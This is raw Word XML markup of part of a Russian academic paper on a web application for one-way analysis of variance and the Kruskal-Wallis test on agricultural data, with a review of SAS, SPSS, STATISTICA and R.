        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:bookmarkStart w:id="11"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2" w:name="_Toc161568203"/>
      <w:bookmarkStart w:id="13" w:name="_Toc162709230"/>
      <w:r w:rsidRPr="00541C36">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="11"/>
      <w:r>
        <w:t xml:space="preserve">Использование </w:t>
      </w:r>
      <w:bookmarkEnd w:id="12"/>
      <w:r w:rsidR="00BF50CB">
        <w:t>информационных технологий и математических моделей для решения задач в сфере сельского хозяйства</w:t>
      </w:r>
      <w:bookmarkEnd w:id="13"/>
    </w:p>
    <w:p w14:paraId="71DE3F5E" w14:textId="657035F4" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_Toc161568204"/>
      <w:bookmarkStart w:id="15" w:name="_Toc162709231"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>Необходимость разработки программы для проведения исследований</w:t>
      </w:r>
      <w:bookmarkEnd w:id="14"/>
      <w:r w:rsidR="000D039E" w:rsidRPr="00F73005">
        <w:t xml:space="preserve"> данных</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="3A5602C7" w14:textId="778FC42C" w:rsidR="000D039E" w:rsidRDefault="000D039E" w:rsidP="000D039E">
      <w:r>
        <w:t>Для решения задач в сельском хозяйстве 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04781C8D"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r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t xml:space="preserve"> [1]</w:t>
      </w:r>
      <w:r w:rsidR="001F5DAE">
        <w:t>.</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38DE689B"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динамических моделей продукционного процесса </w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">
        <w:t>].</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5.5pt" o:ole="">
            <v:imagedata r:id="rId9" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Equation.DSMT4" ShapeID="_x0000_i1025" DrawAspect="Content" ObjectID="_1777754731" r:id="rId10"/>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Pr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00E301E6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="16" w:name="_Toc161568205"/>
      <w:bookmarkStart w:id="17" w:name="_Toc162709232"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>Необходимость использования дисперсионного анализа</w:t>
      </w:r>
      <w:bookmarkEnd w:id="16"/>
      <w:bookmarkEnd w:id="17"/>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17CD6A1B"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18"/>
      <w:r w:rsidRPr="001F5DAE">
        <w:t xml:space="preserve">версии </w:t>
      </w:r>
      <w:commentRangeEnd w:id="18"/>
      <w:r w:rsidR="00BD63ED" w:rsidRPr="001F5DAE">
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:commentReference w:id="18"/>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5A015978"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вокруг средней всех </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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Pr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00E301E6">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc161568206"/>
      <w:bookmarkStart w:id="20" w:name="_Toc162709233"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>Математическая модель дисперсионного анализа и непараметрические методы</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w14:paraId="2915999B" w14:textId="71B148FF" w:rsidR="00DC68C3" w:rsidRPr="00DC68C3" w:rsidRDefault="00DC68C3" w:rsidP="00DC68C3">
      <w:r>
        <w:t xml:space="preserve">В разрабатываемом веб-приложении необходимо запрограммировать статистический модуль: компонент, в котором реализован метод обработки наблюдений с помощью дисперсионного анализа. В данном параграфе будет рассмотрена математическая модель, те формулы, которые позволяют </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>провести однофакторный дисперсионный анализ, с применением непараметрических методов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A231951" w14:textId="37743243"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C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00BD5112">
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidRPr="00C625A2">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3971D788"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rsidR="00295BB1">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6730D0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00BF681E">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:tab/>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00A43272" w:rsidRPr="004C1501">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00A82002">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36A0B5BA" w14:textId="56B5B93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5</w:t>
      </w:r>
      <w:r w:rsidRPr="0043580C">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E685F49" w14:textId="148ED5B0"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46A87397"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00BF681E">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4767399A"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sidR="00BF681E">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8A6F4C9"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r w:rsidR="00C625A2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C625A2" w:rsidRPr="00C625A2">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidR="00C625A2" w:rsidRPr="00C625A2">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>:</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4172D48F" w:rsidR="0093378B" w:rsidRPr="00107CA1" w:rsidRDefault="0093378B" w:rsidP="00D06CCC">
      <w:pPr>
        <w:jc w:val="right"/>
      </w:pPr>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:instrText>QUOTE</w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00BA1029" w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:noProof/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>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AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <m:oMath>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>df</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <m:t>=</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>n</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
          </w:rPr>
          <m:t>-</m:t>
        </m:r>
        <m:r>
          <m:rPr>
            <m:sty m:val="p"/>
          </m:rPr>
          <w:rPr>
            <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="20"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <m:t>a</m:t>
        </m:r>
      </m:oMath>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="20"/>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696AF543"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rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>5</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidR="008F14CF">
        <w:t>.</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248ABB74" w:rsidR="00BC1FD1" w:rsidRDefault="0093378B" w:rsidP="00BC1FD1">
      <w:r>
        <w:t xml:space="preserve">Одним из непараметрических методов дисперсионного анализа является тест по </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Краскелу-Уоллису</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0094">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD0094">
        <w:t xml:space="preserve">]. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Суть метода заключается в присвоении рангов </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>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1"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve">теста </w:t>
      </w:r>
      <w:commentRangeEnd w:id="21"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:rStyle w:val="af0"/>
        </w:rPr>
        <w:commentReference w:id="21"/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>Краскела-Уоллиса</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="00E258B2">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00BC1FD1" w:rsidRPr="00AC25AD">
        <w:t>]</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578F95CD" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Присвоение рангов данных</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2CF3">
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r>
        <w:t>без повторяющихся значений</w:t>
      </w:r>
      <w:r w:rsidRPr="002B2CF3">
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A72C96B" w14:textId="77777777" w:rsidR="00F73005" w:rsidRPr="002B2CF3" w:rsidRDefault="00F73005" w:rsidP="006700C7">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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4C2FDB9B" w:rsidR="006700C7" w:rsidRDefault="006700C7" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Присвоение рангов данных (с повторяющимися значениями)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6308B31B" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pP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78B10046" w:rsidR="00AC25AD" w:rsidRDefault="008F14CF" w:rsidP="004D79A4">
      <w:r>
        <w:t xml:space="preserve">Следует отметить, что однофакторный ди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39646FD9" w14:textId="77777777" w:rsidR="00AC25AD" w:rsidRDefault="00AC25AD">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A968B8" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00464AEF">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc122277549"/>
      <w:bookmarkStart w:id="23" w:name="_Toc161568207"/>
      <w:bookmarkStart w:id="24" w:name="_Toc162709234"/>
      <w:r w:rsidRPr="00403FE8">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
      <w:r w:rsidRPr="00403FE8">
        <w:t>Обзор существующих решений</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
      <w:bookmarkEnd w:id="24"/>
    </w:p>
    <w:p w14:paraId="45235307" w14:textId="77777777" w:rsidR="0093378B" w:rsidRPr="00F73005" w:rsidRDefault="0093378B" w:rsidP="00A82002">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc161568208"/>
      <w:bookmarkStart w:id="26" w:name="_Toc162709235"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>2.1 Агрономические веб-сервисы для работы с агроэкосистемой</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
      <w:bookmarkEnd w:id="26"/>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0505DCDB" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00E364BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Пользовательский интерфейс программы «</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Агромон</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>»</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CF679BA" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00E364BF">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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lastRenderedPageBreak/>
        <w:t>Подобных программ существует достаточно много, и все они практически не отличаются друг от друга. Такие веб-сервисы создаются для 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Pr="00F73005" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="27" w:name="_Toc161568209"/>
      <w:bookmarkStart w:id="28" w:name="_Toc162709236"/>
      <w:r w:rsidRPr="00F73005">
        <w:t>2.2 Описание популярных статистических пакетов</w:t>
      </w:r>
      <w:bookmarkEnd w:id="27"/>
      <w:bookmarkEnd w:id="28"/>
    </w:p>
    <w:p w14:paraId="0EA3C15C" w14:textId="13B51351"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00E258B2" w:rsidRPr="00E258B2">
        <w:t>8</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08359E71"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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">устанавливаемое на пользовательский компьютер, все расчеты выполняются локально. Схема работы типичного статистического пакета отображено на рисунке </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t>:</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2B149242" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Uml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006B109F">
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:t>диаграмма последовательности работы статистического пакета</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3BB7EE" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E1E2EBB" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="004A4E6E">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Безусловно, описанные выше принципы работы статистических пакетов, в их </w:t>
      </w:r>
      <w:r w:rsidRPr="004739DE">
        <w:t>разнообразии приобретают новые черты и особенности с развитием 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26A8A8F1" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы SAS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F65ED42" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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0AD00555" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Окно детальных результатов анализа влияния фактора (Сорт)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69693AE9" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="54B07FD2" w14:textId="68E03A8E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:r>
        <w:t>На примере окна, которое показано на рис</w:t>
      </w:r>
      <w:r w:rsidRPr="008E6783">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w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t>).</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744BD04B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Закладка с попарным сравнением градаций факторов</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B82CCDA" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00584880">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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lastRenderedPageBreak/>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03F98790" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы SPSS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D253EA" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">диске всего 18 Мб и требует всего 4 Мб ОЗУ. Возможности этой программы поистине всеобъемлющие: она может строить уравнение регрессии и делать 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1DE9FF1E" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид программы STATISTICA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34ECE3D6" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="0045581F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pP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lastRenderedPageBreak/>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785A1684" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:r>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свободной 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r w:rsidR="00AC25AD" w:rsidRPr="001F04F3">
        <w:t xml:space="preserve"> [</w:t>
      </w:r>
      <w:r w:rsidR="00E258B2" w:rsidRPr="001F04F3">
        <w:t>9</w:t>
      </w:r>
      <w:r w:rsidR="00AC25AD" w:rsidRPr="001F04F3">
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E75475" w14:textId="77777777" w:rsidR="007B6474" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25175">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="713708B3" wp14:editId="0CCE44E6">
            <wp:extent cx="4810125" cy="3212800"/>
            <wp:effectExtent l="0" t="0" r="0" b="6985"/>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30815" cy="3226619"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="329FE479" w14:textId="5BBC52CE" w:rsidR="007B6474" w:rsidRPr="00AE25A7" w:rsidRDefault="007B6474" w:rsidP="007B6474">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>10</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – Внешний вид </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RStudio</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40717D33" w14:textId="13812F18" w:rsidR="00823137" w:rsidRDefault="007B6474" w:rsidP="00A86ECB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>На сегодняшний день существует очень много качественных статистических пакетов, среди которых самыми лучшими являются</w:t>
      </w:r>
      <w:r w:rsidR="002620AC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">SPSS и SAS. Но </w:t>
      </w:r>
      <w:r w:rsidR="0040023D">
        <w:t>с</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 2013 год</w:t>
      </w:r>
      <w:r w:rsidR="0040023D">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, несмотря на высочайшую конкуренцию, язык R стал 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6B3DF308" w14:textId="0395E18F" w:rsidR="00A86ECB" w:rsidRPr="00A86ECB" w:rsidRDefault="00A86ECB" w:rsidP="00A86ECB">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>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p>
    <w:p w14:paraId="595F59D3" w14:textId="3A6E48EA" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:r w:rsidRPr="00AC25AD">
        <w:t xml:space="preserve">Язык программирования </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC25AD">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29"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00D1599B">
        <w:t>*.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>, чтобы потом заново открыть написанный код;</w:t>
      </w:r>
    </w:p>
    <w:bookmarkEnd w:id="29"/>
    <w:p w14:paraId="0C9AA196" w14:textId="12AA501C" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00D1599B">
      <w:pPr>
        <w:pStyle w:val="12"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="1134" w:hanging="425"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>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lastRenderedPageBreak/>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59A8F635" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>11</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41FA4079" w14:textId="77777777" w:rsidR="00F73005" w:rsidRDefault="00F73005" w:rsidP="00F73005">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74F8A848" w14:textId="77777777" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00F47B32">
      <w:r>
        <w:t xml:space="preserve">Для начала необходимо произвести описательные статистики командой </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>summary</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>
        </w:rPr>
        <w:t>crop.data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="008E6783">
        <w:rPr>
          <w:rStyle w:val="23"/>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lastRenderedPageBreak/>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3888270B" w:rsidR="0093378B" w:rsidRDefault="0093378B" w:rsidP="00C67F95">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="008F392E">
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00C67F95">
        <w:t xml:space="preserve"> </w:t>
